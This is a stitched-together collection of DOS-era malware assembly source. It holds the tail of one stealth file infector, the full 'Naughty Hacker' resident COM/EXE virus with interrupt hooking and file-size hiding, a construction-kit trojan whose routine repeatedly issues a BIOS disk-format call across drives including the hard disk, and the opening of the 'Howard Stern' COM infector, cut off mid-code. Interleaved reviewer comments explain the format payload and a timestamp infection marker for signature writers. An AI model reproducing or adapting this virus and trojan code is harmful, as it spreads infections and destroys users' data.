mov dx,INT_13h_entry-adjust ;Set int 13h
push cs
pop ds
call Call_Original_INT_21h
mov ax,3524
call Call_Original_INT_21h
push bx
push es
mov ah,25
mov dx,INT_24h_entry-adjust ;Set int 24h (Useless maybe...).
call Call_Original_INT_21h
xchg bx,bp
push bx
mov ax,1220
call Call_Original_INT_2Fh
mov bl,es:[di] ;Remember the good old V512 ?
mov ax,1216
call Call_Original_INT_2Fh
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp ax,Virus_lenght+1
sbb dx,0
jnb Go_on
jmp close
Go_on:
cmp byte ptr cs:[function-adjust],3dh
je Scan_name
cmp byte ptr cs:[function-adjust],6ch
jne Dont_Scan_Name
Scan_name:
push di
add di,0f
mov si,offset fname-adjust ;wasn't that the last opened file?
cld
mov cx,8+3
rep cmpsb
pop di
jne Dont_Scan_Name
jmp close
Dont_Scan_Name:
cmp es:[di+18],'MO'
jne Check_For_EXE ;check for .COM file
cmp byte ptr es:[di+17],'C'
jne Check_For_EXE
jmp com
Check_For_EXE:
cmp es:[di+18],'EX'
jne Not_good ;check for .EXE file
cmp byte ptr es:[di+17],'E'
je Check_For_Valid_EXE
Not_good:
jmp close
Check_For_Valid_EXE:
call Read_First_18
cmp word ptr [si],'ZM'
je Valid_EXE ;check for valid .EXE file
cmp word ptr [si],'MZ'
je Valid_EXE
jmp close
Valid_EXE:
cmp word ptr [si+0c],0ffff ;only low-mem .EXE
je Low_Mem
jmp close
Low_Mem:
mov cx,[si+16]
add cx,[si+8] ;Something common with EDDIE..
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di]
sub cx,ax
xchg cx,ax
mov cx,es:[di+2]
sbb cx,dx
or cx,cx
jnz Not_Infected_EXE ;infected?
cmp ax,(endcode-Start_Virus)
jne Not_Infected_EXE
jmp close
Not_Infected_EXE:
mov ax,[si+10]
mov [SP_save-adjust],ax
mov ax,[si+0e]
mov [SS_save-adjust],ax
mov ax,[si+14]
mov [IP_save-adjust],ax
mov ax,[si+16]
mov [CS_save-adjust],ax ;set the new header
mov ax,es:[di]
mov dx,es:[di+2]
add ax,Virus_lenght
adc dx,0
mov cx,200 ;(C) by Lubo & Jan...
div cx
mov [si+2],dx
or dx,dx
jz OK_MOD
inc ax
OK_MOD:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4
push ax
Compute:
shr dx,1
rcr ax,1
loop Compute
pop dx
and dx,0f
sub ax,[si+8]
add dx,Start_Virus-adjust
adc ax,0
mov [si+14],dx
mov [si+16],ax
add ax,(Virus_lenght)/16d+1
mov [si+0eh],ax
mov [si+10],100
write:
mov ax,5700
call Call_Original_INT_21h
push cx
push dx
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
mov cl,20
xchg cl,byte ptr es:[di-0dh]
push cx
mov ah,40 ;this writes the first few bytes and glues the virus
mov dx,buffer-adjust
mov cx,18
call Call_Original_INT_21h
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call Check_For_COMMAND ;(C)
jne Dont_Adjust_Size
sub es:[di+4],Virus_lenght
sbb es:[di+6],0 ;???????????????????????????????
Dont_Adjust_Size:
mov ah,40
sub dx,dx
mov cx,Virus_lenght
call Call_Original_INT_21h
pop cx
mov byte ptr es:[di-0dh],cl
pop dx
pop cx
cmp byte ptr cs:[flag-adjust],0ff
je Set_Time_and_Date
exit:
call Check_For_COMMAND
je Set_Time_and_Date
and cl,11100000b
or cl,60d/2
Set_Time_and_Date:
mov ax,5701
call Call_Original_INT_21h
close:
mov ah,3e
call Call_Original_INT_21h
push es
pop ds
mov si,di
add si,0f
mov di,fname-adjust
push cs
pop es
mov cx,8+3 ;save the fname to a quit place
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-adjust],0ff
jne Dont_Clear_Buffers
mov ah,0dh ;if error occured->clear disk buffers
call Call_Original_INT_21h
Dont_Clear_Buffers:
les bx,[org_13h-adjust]
lds dx,[org_13h-adjust]
mov ah,13
call Call_Original_INT_2Fh
cmp byte ptr cs:[veri-adjust],1
jne Restore_Vectors
mov ax,2e01
call Call_Original_INT_21h
Restore_Vectors:
sub ax,ax
mov ds,ax
pop [24*4+2]
pop [24*4]
pop [13*4+2]
pop [13*4] ;restore vectors and return
ret
com:
test byte ptr es:[di-0dh],4 ;if it is a system file
jnz Not_OK_COM_File ;I had some problems here with
;V1160 & V1776 (with the ball)
cmp es:[di],65535d-Virus_lenght*2-100
ja Not_OK_COM_File
call Read_First_18
cmp byte ptr [si],0E9
jne OK_COM_file
mov ax,es:[di]
sub ax,[si+1] ;infected?
cmp ax,(endcode-Start_Virus+3)
je Not_OK_COM_File
OK_COM_file:
mov word ptr [SS_save-adjust],0FFFF
push si
lodsb
mov word ptr [First_3-adjust],ax
lodsw
mov word ptr [First_3-adjust+1],ax
pop si
mov ax,es:[di]
add ax,Start_Virus-adjust-3
call Check_For_COMMAND
jne Normally
sub ax,Virus_lenght
Normally:
mov byte ptr [si],0E9
mov word ptr [si+1],ax
jmp write
Not_OK_COM_File:
jmp close
Set_Vectors:
sub ax,ax
mov ds,ax
push [1*4]
push [1*4+2] ; <= (C) by N.Hacker.
pushf
pushf
pushf
pushf
mov byte ptr cs:[flag-adjust],ah
mov byte ptr cs:[my_flag-adjust],ah
mov word ptr cs:[limit-adjust],300
mov word ptr cs:[mem_-adjust],org_21h-adjust
mov [1*4],offset trap-adjust
mov [1*4+2],cs
call set_trace
mov ax,3521
call dword ptr [21h*4]
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[mem_-adjust],org_2fh-adjust
call set_trace
mov ax,1200
call dword ptr [2fh*4] ;do trace int 2f
mov byte ptr cs:[flag-adjust],0
mov byte ptr cs:[my_flag-adjust],0FF
mov word ptr cs:[limit-adjust],0C800
mov word ptr cs:[mem_-adjust],org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4] ;do trace int 13
mov byte ptr cs:[flag-adjust],0
mov word ptr cs:[limit-adjust],0F000
mov word ptr cs:[mem_-adjust],Floppy_org_13h-adjust
call set_trace
sub ax,ax
mov dl,al
call dword ptr [13h*4]
pop [1*4+2]
pop [1*4]
les ax,[21*4]
mov word ptr cs:[current_21h-adjust],ax ;get old int 21
mov word ptr cs:[current_21h-adjust+2],es
mov [21*4], INT_21h_Entry_Point-adjust ;set it
mov [21*4+2],cs
retf
set_trace:
pushf
pop ax
or ax,100
push ax
popf
ret
trap:
push bp
mov bp,sp
push bx
push di
cmp byte ptr cs:[flag-adjust],0ff
je off
mov di,word ptr cs:[mem_-adjust]
mov bx,word ptr cs:[limit-adjust]
cmp [bp+4],bx
pushf
cmp word ptr cs:[my_flag-adjust],0ff
jne It_Is_JA
popf
jb Go_out_of_trap
jmp It_Is_JB
It_Is_JA:
popf
ja Go_out_of_trap
It_Is_JB:
mov bx,[bp+2]
mov word ptr cs:[di],bx
mov bx,[bp+4]
mov word ptr cs:[di+2],bx
mov byte ptr cs:[flag-adjust],0ff
off:
and [bp+6],0feff
Go_out_of_trap:
pop di
pop bx
pop bp
iret
Call_Original_INT_21h:
pushf
call dword ptr cs:[org_21h-adjust]
ret
Call_Original_INT_2Fh:
pushf
call dword ptr cs:[org_2fh-adjust]
ret
INT_24h_entry:
mov al,3
iret
;**************************
; (C) by N.Hacker. *
; (bellow) *
;**************************
INT_13h_entry:
mov byte ptr cs:[next_flag-adjust],0
cmp ah,2
jne Other
cmp byte ptr cs:[function-adjust],03Eh
jne Dont_hide
dec byte ptr cs:[next_flag-adjust]
inc ah
jmp Dont_hide
Other:
cmp ah,3
jne Dont_hide
cmp byte ptr cs:[flag-adjust],0ff
je no_error_
cmp byte ptr cs:[function-adjust],03Eh
je Dont_hide
inc byte ptr cs:[next_flag-adjust]
dec ah
Dont_hide:
pushf
call dword ptr cs:[current_13h-adjust]
jnc no_error_
mov byte ptr cs:[flag-adjust],0ff
no_error_:
clc
db 0ca,02,0 ;retf 2
DOS_13h:
cmp byte ptr cs:[next_flag-adjust],0
je OK
cmp ah,2
je Next
cmp ah,3
jne OK
Next:
cmp byte ptr cs:[next_flag-adjust],1
jne Read
inc ah
jne OK
Read:
dec ah
OK:
test dl,80
jz Floppy
jmp dword ptr cs:[org_13h-adjust]
Floppy:
jmp dword ptr cs:[Floppy_org_13h-adjust]
Read_First_18:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,18
mov dx,buffer-adjust
mov si,dx
call Call_Original_INT_21h
ret
Check_For_COMMAND:
cmp es:[di+0f],'OC'
jne Not_COMMAND
cmp es:[di+11],'MM'
jne Not_COMMAND
cmp es:[di+13],'NA'
jne Not_COMMAND ;check for command.com
cmp es:[di+15],' D'
jne Not_COMMAND
cmp es:[di+17],'OC'
jne Not_COMMAND
cmp byte ptr es:[di+19],'M'
Not_COMMAND:
ret
endcode label word
current_21h dd ?
null dd ? ;I forgot to remove this variable...
current_13h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
Floppy_org_13h dd ?
flag db ? ;0ff if error occures
veri db ?
handle dw ?
fname db 8+3 dup (?)
function db ?
my_flag db ?
limit dw ?
mem_ dw ?
next_flag db ?
buffer label word

@@ -0,0 +1,866 @@
.radix 16
;WARNING: THIS IS NOT A BASIC RELEASE BUT A WORK COPY!
;It seems that somebody had steal this version and
;circulates it now.
title The Naughty Hacker's virus version 3.0
comment / Naughty Hacker wishes you the best ! /
jmp start
virlen equ offset endcode-offset begin
alllen equ offset buffer-offset begin
begin label word
IP_save dw 20cdh
CS_save dw ?
SS_save dw ?
far_push dw ?
ident db 'C'
start:
call inf
inf:
pop bp
sub bp,offset start-offset begin+3
push es
push ds
mov es,es:[2]
mov di,start-begin
push ds
push cs
pop ds
mov si,di
add si,bp
mov cx,endcode-inf
cld
rep cmpsb
pop ds
push ds
pop es
je run
ina:
cmp word ptr [0],20cdh
je urud
jmp run
urud:
mov word ptr cs:[bp+handle-begin],0ffff
mov word ptr cs:[bp+counter-begin],2345
mov ax,ds
dec ax
mov ds,ax
sub word ptr [3],80
mov ax,es:[2]
sub ax,80
mov es:[2],ax
push ax
sub di,di
mov si,bp
mov ds,di
pop es
push cs
pop ds
mov cx,alllen
rep movsb
push cs
mov ax,offset run-begin
add ax,bp
push ax
push es
mov ax,offset inss-100-3
push ax
retf
run:
pop ds
pop es
cmp byte ptr cs:[bp+ident-begin],'C'
je comfile
mov dx,cs:[bp+CS_save-begin]
mov cx,cs
sub cx,word ptr cs:[bp+far_push-begin]
add dx,cx
add cx,cs:[bp+SS_save-begin]
cli
mov ss,cx
sti
clear:
push dx
push word ptr cs:[bp+IP_save-begin]
call clearr
retf
comfile:
mov ax,cs:[bp+IP_save-begin]
mov [100],ax
mov ax,cs:[bp+CS_save-begin]
mov [102],ax
mov ax,100
push ax
call clearr
retn
cur:
call exec
push bx
push es
push si
push ax
mov si,dx
cmp byte ptr [si],0ff
jne puf
mov ah,2f
call exec
mov al,byte ptr es:[bx+22d+7+1]
and al,31d
cmp al,31d
jnz puf
cmp word ptr es:[bx+28d+2+7+1],0
jne scs
cmp word ptr es:[bx+28d+7+1],virlen*2
jb puf
scs:
sub word ptr es:[bx+28d+7+1],virlen
sbb word ptr es:[bx+28d+2+7+1],0
puf:
pop ax
pop si
pop es
pop bx
iret
inff:
dec word ptr cs:[counter-begin]
jnz neass
call shop
neass:
cmp ah,11
je cur
cmp ah,12
je cur
cmp ah,4e
jne cur1.1
jmp cur1
cur1.1:
cmp ah,4f
jne cur1.2
jmp cur1
cur1.2:
cmp ah,3ch
je create
cmp ah,5bh
je create
push ax
push bx
push cx
push dx
push si
push di
push bp
push ds
push es
mov byte ptr cs:[function-begin],ah
cmp ah,3dh
je open
cmp ah,3e
je close_
cmp ax,4b00
je execute
cmp ah,17
je ren_FCB
cmp ah,56
je execute
cmp ah,43
je execute
here:
pop es
pop ds
pop bp
pop di
pop si
pop dx
pop cx
pop bx
pop ax
jmp dword ptr cs:[current_21h-begin]
ren_FCB:
call transfer
call coont
jmp here
create:
call exec
mov word ptr cs:[handle-begin],ax
db 0ca,2,0
close_:
cmp word ptr cs:[handle-begin],0ffff
je here
cmp bx,word ptr cs:[handle-begin]
jne here
mov ah,45
call coont
mov word ptr cs:[handle-begin],0ffff
jmp here
execute:
mov ah,3dh
call coont
jmp here
open:
call coont
jmp here
cur1:
call exec
pushf
push ax
push bx
push es
mov ah,2f
call exec
mov al,es:[bx+22d]
and al,31d
cmp al,31d
jne puf1
cmp es:[bx+28d],0
jne scs1
cmp es:[bx+26d],virlen*2
jb puf1
scs1:
sub es:[bx+26d],virlen
sbb es:[bx+28d],0
puf1:
pop es
pop bx
pop ax
popf
db 0ca,2,0 ;retf 2
coont:
call exec
jnc ner
ret
ner:
mov bp,ax
mov byte ptr cs:[flag-begin],0
mov ah,54
call exec
mov byte ptr cs:[veri-begin],al
cmp al,1
jne rty
mov ax,2e00
call exec
rty:
mov ax,3508
call exec
mov word ptr cs:[current_08h-begin],bx
mov word ptr cs:[current_08h-begin+2],es
push bx
push es
mov al,21
call exec
push bx
push es
mov al,24
call exec
push bx
push es
mov al,13
call exec
push bx
push es
mov ah,25
mov dx,int13h-begin
push cs
pop ds
call exec
mov al,21
lds dx,cs:[org_21h-begin]
call exec
mov al,24
push cs
pop ds
mov dx,int24h-begin
int 21
mov al,8
mov dx,int08h-begin
int 21
mov bx,bp
push bx
mov ax,1220
call exec2f
mov bl,es:[di]
mov ax,1216
call exec2f
pop bx
add di,11
mov byte ptr es:[di-15d],2
mov ax,es:[di]
mov dx,es:[di+2]
cmp dx,0
jne contss
cmp ax,virlen
jnb contss
jmp close
contss:
cmp byte ptr cs:[function-begin],3dh
jne hhh
push di
add di,0f
mov si,offset fname-begin
cld
mov cx,8+3
rep cmpsb
pop di
jne hhh
jmp close
hhh:
cmp es:[di+18],'MO'
jne a2
jmp com
a2:
cmp es:[di+18],'EX'
je a8
jmp close
a8:
cmp byte ptr es:[di+17],'E'
je a3
jmp close
a3:
call cont
cmp word ptr [si],'ZM'
je okk
cmp word ptr [si],'MZ'
je okk
jmp close
okk:
cmp word ptr [si+0c],0
jne uuu
jmp close
uuu:
mov cx,[si+16]
add cx,[si+8]
mov ax,10
mul cx
add ax,[si+14]
adc dx,0
mov cx,es:[di+2]
sub cx,dx
or cx,cx
jnz usm
mov cx,es:[di]
sub cx,ax
cmp cx,virlen-(start-begin)
jne usm
jmp close
usm:
mov byte ptr [ident-begin],'E'
mov ax,[si+0e]
mov [SS_save-begin],ax
mov ax,[si+14]
mov [IP_save-begin],ax
mov ax,[si+16]
mov [CS_save-begin],ax
mov ax,es:[di]
mov dx,es:[di+2]
add ax,virlen
adc dx,0
mov cx,200
div cx
mov [si+2],dx
or dx,dx
jz oj
inc ax
oj:
mov [si+4],ax
mov ax,es:[di]
mov dx,es:[di+2]
mov cx,4 ; This could be so:
mov bp,ax ;
and bp,0fh ; mov cx,10
lpp: ; div cx
shr dx,1 ;
rcr ax,1 ;
loop lpp ;
mov dx,bp ;
sub ax,[si+8]
add dx,start-begin
adc ax,0
mov [si+14],dx
mov [si+16],ax
mov word ptr [far_push-begin],ax
add ax,200
mov [si+0eh],ax
write:
sub cx,cx
mov es:[di+4],cx
mov es:[di+6],cx
push es:[di-2]
push es:[di-4]
xchg cx,es:[di-0dh]
push cx
mov ah,40
mov dx,buffer-begin
mov cx,01bh
int 21
cmp byte ptr cs:[flag-begin],0ff
jne ghj
stc
jc exit
ghj:
mov ax,es:[di]
mov es:[di+4],ax
mov ax,es:[di+2]
mov es:[di+6],ax
call com?
jne f2
sub es:[di+4],virlen
sbb es:[di+6],0
f2:
mov ah,40
sub dx,dx
mov cx,virlen
int 21
cmp byte ptr cs:[flag-begin],0ff
jne exit
stc
exit:
pop cx
mov es:[di-0dh],cx
pop cx
pop dx
or byte ptr es:[di-0bh],40
jc closed
call com?
jne f3
and cx,31d
or cx,2
jmp closed
f3:
or cx,31d
closed:
mov ax,5701
int 21
close:
mov ah,3e
int 21
or byte ptr es:[di-0ch],40
push es
pop ds
mov si,di
add si,0f
mov di,offset fname-begin
push cs
pop es
mov cx,8+3
cld
rep movsb
push cs
pop ds
cmp byte ptr cs:[flag-begin],0ff
jne qw
mov ah,0dh
int 21
qw:
cmp byte ptr cs:[veri-begin],1
jne rtyyu
mov ax,2e01
call exec
rtyyu:
sub ax,ax
mov ds,ax
cli
pop [13*4+2]
pop [13*4]
pop [24*4+2]
pop [24*4]
pop [21*4+2]
pop [21*4]
pop [8*4+2]
pop [8*4]
sti
retn
com:
test byte ptr es:[di-0dh],4
jz esc4
jmp close
esc4:
call cont
cmp byte ptr [si],0e9
jne usm2
mov ax,es:[di]
sub ax,[si+1]
cmp ax,virlen-(start-begin-3)
jne usm2
jmp close
usm2:
push si
cmp byte ptr es:[di+17],'C'
jne esc
mov byte ptr [ident-begin],'C'
lodsw
mov cs:[IP_save-begin],ax
lodsw
mov cs:[CS_save-begin],ax
mov ax,es:[di]
cmp ax,65535d-virlen-1
pop si
jb esc
jmp close
esc:
add ax,start-begin-3
call com?
jne f1
sub ax,virlen
f1:
mov byte ptr [si],0e9
mov word ptr [si+1],ax
jmp write
inss:
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
mov ax,0ffff
call dword ptr [21h*4]
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap2-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
mov ax,0ffff
call dword ptr [2fh*4]
sub ax,ax
mov ds,ax
pushf
pop ax
and ax,0feff
push ax
popf
pushf
mov [1*4],offset trap3-begin
mov [1*4+2],cs
pushf
pop ax
or ax,100
push ax
popf
sub ax,ax
call dword ptr [13h*4]
sub ax,ax
mov ds,ax
les ax,[21*4]
mov word ptr cs:[current_21h-begin],ax
mov word ptr cs:[current_21h-begin+2],es
mov [21*4],offset inff-begin
mov [21*4+2],cs
retf
trap:
push bp
mov bp,sp
push bx
cmp [bp+4],300
ja exit2
mov bx,[bp+2]
mov word ptr cs:[org_21h-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_21h-begin+2],bx
and [bp+6],0feff
exit2:
pop bx
pop bp
iret
trap2:
push bp
mov bp,sp
push bx
cmp [bp+4],100
ja exit3
mov bx,[bp+2]
mov word ptr cs:[org_2fh-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_2fh-begin+2],bx
and [bp+6],0feff
exit3:
pop bx
pop bp
iret
trap3:
push bp
mov bp,sp
push bx
cmp [bp+4],0C800
jb exit4
mov bx,[bp+2]
mov word ptr cs:[org_13h-begin],bx
mov bx,[bp+4]
mov word ptr cs:[org_13h-begin+2],bx
and [bp+6],0feff
exit4:
pop bx
pop bp
iret
exec:
pushf
call dword ptr cs:[org_21h-begin]
ret
exec2f:
pushf
call dword ptr cs:[org_2fh-begin]
ret
int08h:
pushf
call dword ptr cs:[current_08h-begin]
push ax
push ds
sub ax,ax
mov ds,ax
cli
mov [13*4],offset int13h-begin
mov [13*4+2],cs
mov [8*4],offset int08h-begin
mov [8*4+2],cs
mov ax,word ptr cs:[org_21h-begin]
mov [21*4],ax
mov ax,word ptr cs:[org_21h-begin+2]
mov [21*4+2],ax
mov [24*4],offset int24h-begin
mov [24*4+2],cs
sti
pop ds
pop ax
iret
int24h:
mov al,3
iret
int13h:
pushf
call dword ptr cs:[org_13h-begin]
jnc dfg
mov byte ptr cs:[flag-begin],0ff
dfg:
clc
db 0ca,02,0 ;retf 2
cont:
sub ax,ax
mov es:[di+4],ax
mov es:[di+6],ax
mov ah,3f
mov cx,01bh
mov dx,offset buffer-begin
mov si,dx
int 21
cmp byte ptr cs:[flag-begin],0ff
jne a1
stc
pop ax
jmp close
a1:
ret
com?:
cmp es:[di+0f],'OC'
jne zz
cmp es:[di+11],'MM'
jne zz
cmp es:[di+13],'NA'
jne zz
cmp es:[di+15],' D'
jne zz
cmp es:[di+17],'OC'
jne zz
cmp byte ptr es:[di+19],'M'
zz:
ret
transfer:
cld
inc dx
mov si,dx
mov di,offset buffer-begin
push di
push cs
pop es
mov cx,8
rep movsb
mov al,'.'
stosb
mov cx,3
rep movsb
mov al,0
stosb
pop dx
push cs
pop ds
mov ax,3d00
ret
e1:
cli
push ax
push di
push es
mov ax,0b800
mov es,ax
mov ax,word ptr cs:[pos-begin]
push ax
call comp
mov ax,word ptr cs:[strg-begin]
stosw
pop ax
or ah,ah
jz s3
cmp ah,24d
jb s1
s3:
neg byte ptr cs:[y-begin]
s1:
or al,al
jz s4
cmp al,79d
jb s2
s4:
neg byte ptr cs:[x-begin]
s2:
mov ah,byte ptr cs:[y-begin]
mov al,byte ptr cs:[x-begin]
add byte ptr cs:[pos+1-begin],ah
add byte ptr cs:[pos-begin],al
mov ax,word ptr cs:[pos-begin]
call comp
mov ax,es:[di]
mov word ptr cs:[strg-begin],ax
mov es:[di],0f07
pop es
pop di
pop ax
sti
iret
comp:
push ax
push bx
sub bh,bh
mov bl,al
mov al,160d
mul ah
add ax,bx
add ax,bx
mov di,ax
pop bx
pop ax
ret
shop:
push ax
push ds
mov byte ptr cs:[x-begin],0ff
mov byte ptr cs:[y-begin],0ff
mov word ptr cs:[pos-begin],1013
mov ax,0003
int 10
sub ax,ax
mov ds,ax
cli
mov [1c*4],offset e1-begin
mov [1c*4+2],cs
sti
pop ds
pop ax
ret
clearr:
sub ax,ax
sub bx,bx
sub cx,cx
sub dx,dx
sub si,si
sub di,di
sub bp,bp
ret
db 666d ;Foolish ?!! -> dw 666d
db 55,0AA
endcode label word
current_21h dd ?
current_08h dd ?
org_2fh dd ?
org_13h dd ?
org_21h dd ?
flag db ?
veri db ?
handle dw 0ffff
fname db 8+3 dup (?)
function db ?
pos dw ?
x db ?
y db ?
strg dw ?
counter dw ?
buffer label word
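Review bot: Nothing in this listing tells a reader that `.radix 16` on its first line makes every unsuffixed literal hexadecimal, so `int 21`, `cmp ah,11` and `mov ax,4b00` are INT 21h, AH=11h and AX=4B00h, and only `d`-suffixed values such as `31d` are decimal. A header comment saying so would prevent misreading the function dispatch at `inff`. The detection-relevant behaviour is also undocumented: `f3` ORs 31d into the time word before the `5701` call at `closed`, and `cur`/`cur1` test the directory entry for that value and subtract `virlen` from the reported size. At `cur1` I would add something like `; marker: time field low 5 bits = 31d (62 s, invalid) -> size shown minus virlen`. A file whose timestamp carries that seconds value, examined from a clean boot, is the indicator to look for.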
@@ -0,0 +1,20 @@
.model tiny
.code
;******************************************************************************
;The host program starts here. This one is a dummy that just returns control
;to DOS.
public HOST
db 100 dup (0)
HOST:
mov ax,4C00H ;Terminate, error code = 0
int 21H
HOST_END:
END

@@ -0,0 +1,88 @@
; Trojan Horse Constructed with...
; The Trojan Horse Construction Kit, v1.00
; Copyright(c) 1992, Stingray/VIPER
; A Viral Inclined Programming Experts Ring Programming Team Production.
IDEAL
DOSSEG
MODEL small
STACK 256
DATASEG
msg_1 db "",13,10
db "This is a Trojain horse. Curtocy of White Shark! HA HA HA",13,10
db "",13,10
db "Mess with White Shark and you'll be eaten alive!",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db '$'
msg_2 db "",13,10
db "You've been fucked! Curtocy of White Shark!",13,10
db "",13,10
db "Mess with White Shark and you'll be eaten alive!",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db "",13,10
db '$'
vip db "±ÅÆÐ}ÑÏÌǾË}Ô¾Ð}ÀϾÑÂÁ}ÔÆÑÅ‹‹‹",106,103
db "±ÅÂ}±ÏÌǾË}¥ÌÏÐÂ} ÌËÐÑÏÒÀÑÆÌË}¨ÆÑ‰}ÓŽ‹",106,103
db " ÌÍÖÏÆÄÅÑ}…À†}Ž––‰}³ÆÏ¾É}¦ËÀÉÆËÂÁ}­ÏÌÄϾÊÊÆËÄ}¢ÕÍÂÏÑÐ}¯ÆËÄ‹",106,103
CODESEG
Start:
mov ax,@data
mov ds,ax
mov ah,9
mov dx,offset msg_1
int 21h
mov dl,24
aqui:
call fry
call fry
call fry
inc dl
cmp dl,1
jne aqui
mov ah,9
mov dx,offset msg_2
int 21h
mov si,offset vip
call DeCrypt_Print
jmp Exit
PROC DeCrypt_Print
push ax
push dx
here:
lodsb
or al,al
je no_mas
xchg dl,al
sub dl,93
mov ah,2
int 21h
jmp short here
no_mas:
pop ax
pop dx
ret
ENDP DeCrypt_Print
PROC fry
push dx
mov ax,ds
mov es,ax
mov ax,0701h
mov ch,0
int 13h
pop dx
ret
ENDP fry
Exit:
mov ax,4c00h
int 21h
END Start
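Review bot: `fry` carries no comment saying what it does: it issues INT 13h with AX=0701h and CH=0 on the drive number in DL, and AH=07h is, as far as I recall from the BIOS interrupt lists, the XT-era fixed-disk format-from-track call. The loop at `aqui` starts DL at 24 and runs until the byte wraps round to 1, so the call is made three times for every drive number from 24 through 255 and then 0, which includes 80h. I would put `; payload: INT 13h AH=07h (format), DL = 24..255,0 incl. 80h` above `PROC fry`. The `vip` text is decoded in `DeCrypt_Print` by subtracting 93 from each byte, which is worth a comment next to the data for anyone writing a string signature.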
@@ -0,0 +1,472 @@
; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ
; uK E-ÿÿÿÿÿÿ
; E- 'HOWARD STERN ViRUS ASM SOURCE' Nuÿÿÿÿÿÿ
; Nu KEÿÿÿÿÿÿ
; KE ~~~~~~~~~~~~~~~~~~~~~~~~~~~ -Nÿÿÿÿÿÿ
; -N by uKÿÿÿÿÿÿ
; uK DEATHBOY [NuKE] E-ÿÿÿÿÿÿ
; E- Nuÿÿÿÿÿÿ
; E-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-Nuÿÿÿÿÿÿ
;ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ
; [HOWARD].ASM -- The Howard Stern virus
;
; Written by DeathBoy[NuKE]
;
; Well, this ought to turn some heads... NOT... this is the source code for
; a New Virus... It displays ' I'm Not working until Howard Stern is Done
; @ 11:00 am. Bow down Before the King.' if the infected program is ran
; anytime before 11:00 am.===> Then lock up the Computer!
; It is a Non-Resident .COM infector that is 967 bytes long
; compiled...TO make this a Working DEMO...you will need TASM v2.0
; or better... ( TASM /mx /m2 /q HOWARD.asm ) then
; ( TLINK /x /t HOWARD.obj )
; the result should be a 1003 byte *.COM file infector that follows
; the DOS PATH= looking for victim files...
; it will only infect 2 files per execution
; of an infected file...
;
; CHEERS TO YOU HOWARD & Robin, I'm a Big FAN... Please
; COME TO ATLANTA, GA...
; Infinity ( 92.9 FM ) has the GreaseIdiot on & I'm
; going Crazy!
;
; Ps. I thought the Book was funny, #2 on the Best-seller's list in the
; area Stores ( & YOU ARE NOT ON DOWN HERE !!! ) ... Keep it up...
;
;=====> The intent of this VIRUS is not to destroy but to Annoy, !
;Please do not give anyone this virus unless they want it, Knowingly ...
; You are responsible for your actions...
;
; BTW, there is a slight Bug in the Virus, put there on purpose
; It is an easy one to find & FIX... IF you can fix it,
; then :) You do not need to register.
;
; If not... then you do not need to know how.
; OR
; If you register however, I will take out the 'Beg/Buggy-Code'
;
; Get you AV idiots... FYA ESAD YMABFFW
;
; Long Live [NuKE], ARiSToTLE, NT, BO, & the latest [NuKE]
; member .. NoSFaRTu(sp) :)
;
;----------------------------CUT HERE-----------------------------------
code segment byte public
assume cs:code,ds:code,es:code,ss:code
org 0100h
main proc near
push di ; Stupid Shit For Stupid
push bp ; Programs
push dx ;
mov ax,05FEh ; Trash some mem. res.
mov dx,0A6BAh ; software...
not ax ;
not dx ;
int 16h ; golly wally, did that work?
mov ax,05FDh ;
mov dx,0A6BAh ; Maybe this time ???
mov bx,0000h ;
not ax ;
not dx ;
int 16h ;
pop dx ;
pop bp ;
pop di ; Ok. lets do this.
db 0E9h,00h,00h ; Standard BS pointer
start: call get_loc ; Like an Old trick
get_loc: pop bp ; BP holds old IP
sub bp,offset get_loc; Adjust for length of host
lea si,[bp + buffer] ; SI points to original start
mov di,0100h ; Push 0100h on to stack for
xchg ax,bx ; beat the heat
xchg bx,ax ; with clean code
push di ; return to main program
movsw ; Copy the first two bytes
movsb ; Copy the third byte
mov di,bp ; DI points to start of virus
push sp ; doing the nasty with the
pushf ; stupid coding.
push bp ; Are you sure you know
push di ; what you are doing??
push dx ; Doesn't look it??
call disvsafe ; Ahh, FiDO-DoRKS LOOK HERE
pop dx ; Snoop-doogy dawg...
pop di ; Yippie-Oh Yippie-heh.
pop bp ;
popf ; Freedom to do as I please.
pop sp ;
mov bp,sp ; BP points to stack
sub sp,128 ; Allocate 128 bytes on stack
mov ah,02Fh ; DOS get DTA function
int 021h
push bx ; Save old DTA address on stack
mov ah,01Ah ; DOS set DTA function
lea dx,[bp - 128] ; DX points to buffer on stack
xchg ax,bx ; Do Stuff for fun.
xchg ax,bx ; Reiterate that
int 021h ; R U still reading this??
; WHy??? :^)
call search_me ; Find and infect a file
call search_me ; 2 files
call get_hour
cmp ax,000Bh ; Did the function return 11?
jle go_next ; If less than or equal, do effec
jmp not_yet ; Otherwise skip over it
go_next: cmp ax,0006h ; Before 6:00am ??
jge strt00 ; Yep, Go do it
